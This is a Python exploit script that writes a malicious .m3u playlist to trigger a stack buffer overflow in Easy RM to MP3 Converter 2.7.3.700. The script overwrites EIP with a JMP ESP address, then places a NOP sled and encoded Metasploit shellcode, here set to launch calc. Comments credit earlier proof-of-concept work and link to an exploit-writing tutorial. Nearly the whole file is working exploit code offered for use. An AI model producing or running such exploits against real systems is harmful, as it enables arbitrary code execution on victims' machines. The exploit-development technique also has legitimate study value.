#!/usr/bin/env python
#
# Easy RM to MP3 Converter 2.7.3.700 (.m3u) File Universal Buffer Overflow Exploit
# Vulnerability discovered by Crazy_Hacker who reported with a POC
# The poc was for SP2 (it doesn't work) http://packetstormsecurity.org/files/view/79307/easyrmmp3-overflow.txt
# Corelanc0d3r wrote the sploit again but to work under SP3 
# http://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/
#

import sys

def usage():
  if len(sys.argv) != 2:
    print '''
    |-----------------------------------------------|
    |[+] Easy RM to MP3 Converter 2.7.3.700 exploit |
    |[+] Tested on: Windows XP SP2 (ENG)            |
    |[+] Home: http://lnxg33k.wordpress.com         |
    |[+] Written by: Ahmed el-3ntry aka lnxg33k     |
    |[+] Email me @: ahmed [at] isecur1ty.org       |
    |-----------------------------------------------|
    '''
    print 'Usage:\n\t%s [file.m3u]' % sys.argv[0]
    sys.exit(1)
usage()

m3uf = sys.argv[1]

buff  = 'A' *26072
buff += '\x3a\xf2\xa8\x01'              # EIP overwrite MSRMCc_2 (01A8F23A JMP ESP)
buff += 'CCCC'                          # 4 bytes of garbage 
buff += '\x90' *25                      # 25 bytes of nop sleds

# sh-4.1$ msfpayload windows/exec CMD=calc r | msfencode -a x86 -b '\x00\x09\x0a' -t c
buff += ("\xba\xf8\x41\x8a\x4a\xd9\xf7\xd9\x74\x24\xf4\x5b\x2b\xc9\xb1"
         "\x32\x83\xeb\xfc\x31\x53\x0e\x03\xab\x4f\x68\xbf\xb7\xb8\xe5"
         "\x40\x47\x39\x96\xc9\xa2\x08\x84\xae\xa7\x39\x18\xa4\xe5\xb1"
         "\xd3\xe8\x1d\x41\x91\x24\x12\xe2\x1c\x13\x1d\xf3\x90\x9b\xf1"
         "\x37\xb2\x67\x0b\x64\x14\x59\xc4\x79\x55\x9e\x38\x71\x07\x77"
         "\x37\x20\xb8\xfc\x05\xf9\xb9\xd2\x02\x41\xc2\x57\xd4\x36\x78"
         "\x59\x04\xe6\xf7\x11\xbc\x8c\x50\x82\xbd\x41\x83\xfe\xf4\xee"
         "\x70\x74\x07\x27\x49\x75\x36\x07\x06\x48\xf7\x8a\x56\x8c\x3f"
         "\x75\x2d\xe6\x3c\x08\x36\x3d\x3f\xd6\xb3\xa0\xe7\x9d\x64\x01"
         "\x16\x71\xf2\xc2\x14\x3e\x70\x8c\x38\xc1\x55\xa6\x44\x4a\x58"
         "\x69\xcd\x08\x7f\xad\x96\xcb\x1e\xf4\x72\xbd\x1f\xe6\xda\x62"
         "\xba\x6c\xc8\x77\xbc\x2e\x86\x86\x4c\x55\xef\x89\x4e\x56\x5f"
         "\xe2\x7f\xdd\x30\x75\x80\x34\x75\x89\xca\x15\xdf\x02\x93\xcf"
         "\x62\x4f\x24\x3a\xa0\x76\xa7\xcf\x58\x8d\xb7\xa5\x5d\xc9\x7f"
         "\x55\x2f\x42\xea\x59\x9c\x63\x3f\x3a\x43\xf0\xa3\xbd")

f= open(m3uf, 'w')
f.write(buff)
f.close
print '\n[+] File written successfully in %s\n' % m3uf